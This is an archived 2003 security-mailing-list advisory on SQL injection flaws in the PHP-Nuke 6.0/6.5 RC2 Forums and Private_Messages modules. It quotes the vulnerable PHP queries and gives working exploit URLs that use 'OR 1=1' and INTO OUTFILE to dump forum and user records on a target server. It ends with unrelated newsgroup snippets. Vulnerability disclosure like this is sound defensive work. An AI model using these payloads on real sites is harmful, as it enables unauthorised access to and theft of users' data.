[VulnWatch] PHP-Nuke 6.0 & 6.5RC2 SQL Injection Again

• Previous message: Tom Tanaka: "[VulnWatch] .MHT Buffer Overflow in Internet Explorer"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: "Frog Man" <leseulfrog@hotmail.com>
To: fpc@openmax.com, bugtraq@securityfocus.com, vulnwatch@vulnwatch.org
Date: Mon, 10 Mar 2003 22:48:22 +0100

Informations :
°°°°°°°°°°°°°°
Language : PHP
Website : http://www.phpnuke.org
Version : 6.0 & 6.5 RC2
Modules : Forums, Private_Messages
Problem : SQL Injection

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
/modules/Forums/viewtopic.php :

------------------------------------------------------------------------
$sql = "SELECT forum_type, forum_id, forum_pass, forum_name, forum_access,
forum_moderator, forum_atch FROM ${prefix}_forums WHERE forum_id =
'$forum'";
------------------------------------------------------------------------

/modules/Forums/viewforum.php :

------------------------------------------------------------------------
$sql = "SELECT f.forum_id, f.forum_type, f.forum_pass, f.forum_name,
u.uname, u.uid,m.forum_id,m.user_id FROM
${prefix}_forums f, ".$user_prefix."_users u, ${prefix}_forum_mods m
WHERE f.forum_id = '$forum' AND m.forum_id = '$forum' AND m.user_id =
u.uid";
------------------------------------------------------------------------

/modules/Forums/reply.php :
------------------------------------------------------------------------
$sql = "SELECT forum_name, forum_access, forum_moderator, forum_atch FROM
${prefix}_forums WHERE (forum_id = '$forum')";
------------------------------------------------------------------------

/modules/Forums/newtopic.php :
------------------------------------------------------------------------
$sql = "SELECT forum_type, forum_pass, forum_name, forum_access,
forum_moderator, forum_atch FROM ${prefix}_forums WHERE (forum_id =
'$forum')";
------------------------------------------------------------------------

/modules/Forums/editpost.php :
------------------------------------------------------------------------$sql
= "SELECT forum_name, forum_access, forum_moderator, forum_atch FROM
${prefix}_forums WHERE forum_id = '$forum'";
------------------------------------------------------------------------

/modules/Private_Messages/reply.php :
------------------------------------------------------------------------
if ($reply || $send) {

    if ($uname != "") {
        $res = sql_num_rows(sql_query("select * from ".$user_prefix."_users where
uname='$uname'", $dbi), $dbi);
------------------------------------------------------------------------

Exploits :
°°°°°°°°°°
- This will save forums informations into a txt file :
http://[target]/modules.php?op=modload&name=Forums&file=viewtopic&topic=1&forum=1'%20INTO%20OUTFILE%20'[path/to/site]/vt.txt
http://[target]/modules.php?op=modload&name=Forums&file=viewforum&forum='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/vf.txt'/*
http://[target]/modules.php?op=modload&name=Forums&file=reply&forum=1')%20INTO%20OUTFILE%20'[/path]/reply.txt'/*
http://[target]/modules.php?op=modload&name=Forums&file=newtopic&forum=1')%20INTO%20OUTFILE%20'[/path]/newtopic.txt'/*

http://[target]/modules.php?op=modload&name=Forums&file=editpost&forum=1'%20INTO%20OUTFILE%20'[/path]/editpost.txt

etc...

- This will save all users informations into a txt file :

http://[target]/modules.php?name=Private_Messages&file=reply&send=1&uname='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/users.txt

Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info

More Details In French :
°°°°°°°°°°°°°°°°°°°°°°°°
http://www.frog-man.org/tutos/PHP-Nuke6.0-Forums-Private_Messages.txt

frog-m@n

_________________________________________________________________
Recevez vos e-mails MSN Hotmail par SMS sur votre GSM !
http://www.fr.msn.be/gsm/servicesms/hotmailparsms

• Previous message: Tom Tanaka: "[VulnWatch] .MHT Buffer Overflow in Internet Explorer"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages PHP-Nuke 6.0 & 6.5RC2 SQL Injection Again ... Website: http://www.phpnuke.org ... Modules: Forums, Private_Messages ... Problem: SQL Injection ... uname='$uname'", $dbi), $dbi); ... (Bugtraq) Optimized or not ? ... Been reading other posts on other forums, i.e. Nukecops. ... My original code is this: ... title='$module'", $dbi); ... (comp.lang.php) Good computer maintenance advice from Dawn ... It is impossible that your PC doesn't act up every once in a while. ... The best website to begin learning more about computers and related ... to visit first is the forums' section. ... Section" where you can access how-to guides related to purchasing PC ... (soc.culture.indian) Re: DIRECT launcher article in AIAA Houston Horizons ... on SEVERAL space forums and blogs like NewMars, ... AND HUNDREDS POSTS LATER MY "FAST-SLV" CONCEPT). ... before "Direct") and WHERE (on my website) the idea of Single Launch ... (sci.space.policy) Re: Differences Between Bachmann Products ... Anyone who operates a website has the right to decide what will and what ... posts would be such forums, BTW. (There are other issues with blogs, most ... Any jurisdiction that has free speech guarantees of some sort faces these ... (rec.models.railroad)